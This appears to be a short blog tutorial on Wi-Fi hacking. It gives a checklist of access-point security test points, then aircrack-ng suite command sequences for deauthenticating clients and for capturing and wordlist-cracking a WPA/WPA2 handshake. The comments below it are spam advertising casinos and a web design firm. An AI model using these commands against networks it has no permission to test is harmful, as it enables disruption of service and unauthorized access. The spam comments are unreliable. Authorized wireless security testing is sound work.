WIFI Hacking!


Hello Hackers!

In this blog I am going to show you the basic things about WIFI hacking. Special thanks to Akshay for  well written content :)





################## KEY WORDS ###################

MAC - Media Access Control
BSSID - Basic Service Set Identifier
ESSID - Extended Service Set Identifier
SNR - Signal to Noise Ratio
PSK - Pre Shared Key
WPA - WiFi Protected Access
WEP - Wired Equivalent Privacy
WPS - Wi-fi Protected Setup




Test points:
-------------
# Is the AP running the latest firmware and security patches?
# Has the factory default ESSID been changed?
# Has the default administrative login/password been changed?
# Is the administrative password easily cracked?
# Are stronger authentication options available ?
# Are there any unnecessary ports open (e.g., Telnet, HTTP, SNMP,)?
# Are those open ports vulnerable to known exploits?
# Are encrypted administrative interfaces available (e.g., SSH, HTTPS)?
# Have security alerts or logs been enabled ?
# Are its security parameters consistent with defined policy?
# If the AP is using a PreShared Key (PSK), is it easily cracked?
# If the AP is not using WPA2, can it be upgraded to do so?
# Can the AP withstand simulated 802.11 DoS attacks (e.g., flood attack)?


De-authentication Attack
---------------------------
airodump-ng --channel <ch #> --bssid <mac id> wlan0mon

aireplay-ng --deauth <# of deauth packets> -a <AP mac> -c <client mac> wlan0mon



WPA/WPA2 Cracking:
-------------------

(!) airmon-ng start wlan0
    # Get the wireless card in monitoring mode to capture the traffic.

(!) airodump-ng wlan0mon
    # Start to listen the network traffic and get BSSID & ESSID of targets

(!) airodump-ng --bssid <bssid of AP> -c <ch #> --write <filename> wlan0mon
    # Avoid extra noise from traffic by listening to a single target.
    # Get the BSSID of the clients connected to the target.
    # Write the dump to a file, which may also contain the 4 way handshake.

(!) aireplay-ng --deauth <# of frames> -a <AP bssid> wlan0mon
    # Deauthenticate clients of target and force them to establish the 4 way handshake.
    # 4 way handsake will be captured in our file as the dumping is running the background.

(!) aircrack-ng <filename> -w <wordlist>


    # Crack the key form the captured file by providing a wordlist





6 comments:

  1. Golden Slots have many exciting to you all customers.


    Golden slot Casinos that are open to the casino is a lot of excitement so that all customers who come to play gambling games is the easiest because of the way our website has a way of playing. In addition, our website is the most popular online gaming site and the most popular online gaming site. We have a very simple way to play the game, so you can always make the most of your bet. Casinos today, all the players have to come to the source of online casinos that provide the best of online gambling.

    Pool only came to gamble online with the modernization of the service quality is one of the online casinos gambling that people should not miss out on bets. All online gambling games allow the player to choose the most convenient bet, the most exciting gambling activities, the most exciting, the most modern, the highest quality service. As an online casino, every player should not miss the bet. All online gambling games allow the player to choose the most convenient bets to participate in the most exciting and exciting casino gambling. โกลเด้นสล็อต

    ReplyDelete
  2. Thanks To Ur Block
    And
    http://www.horizonss.co.in/web-development-2/

    web development company|website design company|web development company in india|web development company in usa
    Call:+91-9057710001,2,6

    #web development company
    #website design company
    #web development company in india
    #web development company in usa
    #webdevelopmentcompany
    #webdesigncompany
    #websitedesigncompany
    #websitedevelopmentcompany
    #web #development #company
    #website #design #company
    #web #development #company #in #india
    #web #development #company #in #usa

    ReplyDelete
  3. G club Our website is available through mobile.

    G club Is an online gaming site of online gambling that is highly respected by online gamblers across Asia. And to return the player's expectations to the range.
    Our website G club is also available through mobile. About people who do not like to sit on the computer screen for a long time, our site, which is an application because of the game of gambling on the smartphone of ours is very proud to say. To do it for mobile phone players especially. Support both IOS and Android operating system, so do not worry about security. Image and sound are not inferior.
    On the site G club. So, do not be bothered by the lack of entertainment to access the game to risk it, and even play at anytime, anywhere at home, at work or anywhere. Just have you have 3G Internet. 4G or flammable, it can be used as a network all networks are available. Do not wait, hurry to join gclub ผ่านเว็บ the fun.

    ReplyDelete

WIFI Hacking!

Hello Hackers! In this blog I am going to show you the basic things about WIFI hacking.   Special thanks to Akshay for   well writ...